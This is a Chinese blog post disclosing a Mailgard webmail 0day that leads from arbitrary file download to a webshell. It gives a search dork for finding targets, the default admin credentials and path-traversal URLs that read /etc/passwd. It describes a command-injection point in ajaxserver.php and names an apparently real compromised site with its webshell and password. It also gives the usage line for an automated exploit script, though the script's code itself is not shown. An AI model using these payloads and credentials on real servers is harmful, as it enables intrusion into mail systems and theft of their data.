佑友(mailgard webmail)邮件服务器getshell 0day

一、任意文件下载(需要登录)
百度搜索intitle:”mailgard webmail”,多家没有改admin密码的中招,默认密码admin/hicomadmin
http://mail.xxx.com.cn/src/read_file.php?signature=../../../../../../../etc/passwd
http://mail.xxx.com.cn/src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd
根据此漏洞读取lighttpd error.log得到web更目录:/var/www/newmail/
down
二、系统命令执行导致getshell
下载文件进行代码审计,找到一个命令执行漏洞
/var/www/newmail/src/ajaxserver.php第1789行开始:

直接毁了magic_quotes_gpc和addslashes的防护(系统自身带了全局过滤,代码抄袭discuz的),导致getshell:
EXP如下,得到webshell,http://mail.sihc.com.cn/shell.php,密码123

shell

自动化exp如下:
用法python fuck.py http://mail.test.com:80/ 帐号 密码

getshell

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录